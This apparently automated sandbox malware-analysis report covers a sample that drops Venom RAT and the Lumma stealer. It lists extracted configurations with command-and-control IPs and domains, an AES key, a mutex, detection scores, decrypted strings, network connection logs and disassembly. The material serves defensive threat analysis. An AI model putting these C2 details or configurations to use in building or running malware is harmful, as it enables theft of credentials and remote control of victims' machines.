"MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null"}
Source: 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null", "External_config_on_Pastebin": "false"}
Source: BitLockerToGo.exe.3588.13.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "bOKHNM--"}

Multi AV Scanner detection for domain / URL

Source: liernessfornicsa.shop	Virustotal: Detection: 19%	Perma Link
Source: callosallsaospz.shop	Virustotal: Detection: 19%	Perma Link
Source: mussangroup.com	Virustotal: Detection: 13%	Perma Link
Source: https://liernessfornicsa.shop/0	Virustotal: Detection: 15%	Perma Link
Source: callosallsaospz.shop	Virustotal: Detection: 19%	Perma Link
Source: liernessfornicsa.shop	Virustotal: Detection: 19%	Perma Link
Source: https://liernessfornicsa.shop/q	Virustotal: Detection: 13%	Perma Link
Source: upknittsoappz.shop	Virustotal: Detection: 19%	Perma Link
Source: shepherdlyopzc.shop	Virustotal: Detection: 19%	Perma Link
Source: https://mussangroup.com/wp-content/images/pic1.jpg	Virustotal: Detection: 6%	Perma Link
Source: https://callosallsaospz.shop:443/api	Virustotal: Detection: 22%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll	ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Source: FpiUD4nYpj.exe

Virustotal: Detection: 43%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\2FBE.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jjistfr	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FpiUD4nYpj.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: indexterityszcoxp.shop
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lariatedzugspd.shop
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: callosallsaospz.shop
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: outpointsozp.shop
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: liernessfornicsa.shop
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: upknittsoappz.shop
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shepherdlyopzc.shop
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: unseaffarignsk.shop
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: callosallsaospz.shop
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp	String decryptor: bOKHNM--

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 13_2_00757A10 CryptUnprotectData,

13_2_00757A10

Source: 2FBE.exe, 00000006.00000003.2413624560.0000020A58401000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_98d2b9bf-d

Source: FpiUD4nYpj.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50782 version: TLS 1.0

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:50695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.4:50703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.4:50720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:50724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:50832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:50833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:50834 version: TLS 1.2

Source:	Binary string: System.Core.pdb(khvD source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Xml.ni.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: rust_dave_sideload.pdb source: vm.exe, 00000012.00000002.4127183410.000000006CA98000.00000002.00000001.01000000.00000015.sdmp, lm.exe, 00000013.00000002.3195290349.000000006CA28000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 00000019.00000002.3262778994.000000006CA98000.00000002.00000001.01000000.00000015.sdmp, g2m.dll0.14.dr
Source:	Binary string: System.ni.pdbRSDS source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: BitLockerToGo.pdb source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000002.2594862605.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000003.2564338018.000001A460D90000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000003.2564243556.000001A460DD0000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000002.2594862605.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 0000000E.00000002.2733250356.000002EC2EF61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2733250356.000002EC2EF1E000.00000004.00000800.00020000.00000000.sdmp, vm.exe.14.dr, lm.exe.14.dr
Source:	Binary string: System.pdb) source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: BitLockerToGo.pdbGCTL source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000002.2594862605.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000003.2564338018.000001A460D90000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000003.2564243556.000001A460DD0000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000002.2594862605.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Xml.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 0000000E.00000002.2733250356.000002EC2EF61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2733250356.000002EC2EF1E000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000012.00000000.2710580492.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 00000012.00000002.4109799058.0000000000402000.00000002.00000001.01000000.00000013.sdmp, lm.exe, 00000013.00000000.2710612115.0000000000402000.00000002.00000001.01000000.00000014.sdmp, lm.exe, 00000013.00000002.3156773768.0000000000402000.00000002.00000001.01000000.00000014.sdmp, vm.exe, 00000019.00000000.2826688017.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 00000019.00000002.3132755936.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe.14.dr, lm.exe.14.dr
Source:	Binary string: System.Core.ni.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: mscorlib.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: mscorlib.ni.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Windows.Forms.pdb- source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Core.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.ni.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERA01C.tmp.dmp.28.dr

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+50h]	13_2_007591C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+54h]	13_2_00757189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	13_2_00757189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	13_2_0077A479
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp]	13_2_00779C20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push eax	13_2_00773CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+30h]	13_2_0074FCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+00000200h]	13_2_0074FCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	13_2_00756CB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+70h]	13_2_00757DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	13_2_00757DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	13_2_00752E51
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	13_2_00777E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000820h]	13_2_00766F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+1Ch]	13_2_00766F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	13_2_00766F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+50h]	13_2_00766F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ecx], ax	13_2_00755871
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	13_2_0077B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	13_2_0077B840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h	13_2_0075D810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	13_2_0074A000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	13_2_007530F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	13_2_007530F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, eax	13_2_007438D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000820h]	13_2_00766F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esi+1Ch]	13_2_00766F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	13_2_00766F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+50h]	13_2_00766F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h	13_2_0075E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	13_2_0075E086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00778880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000820h]	13_2_0076788A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, word ptr [ebx+eax*4]	13_2_00748960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	13_2_00748960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	13_2_0077B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	13_2_0077B160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	13_2_0077B160
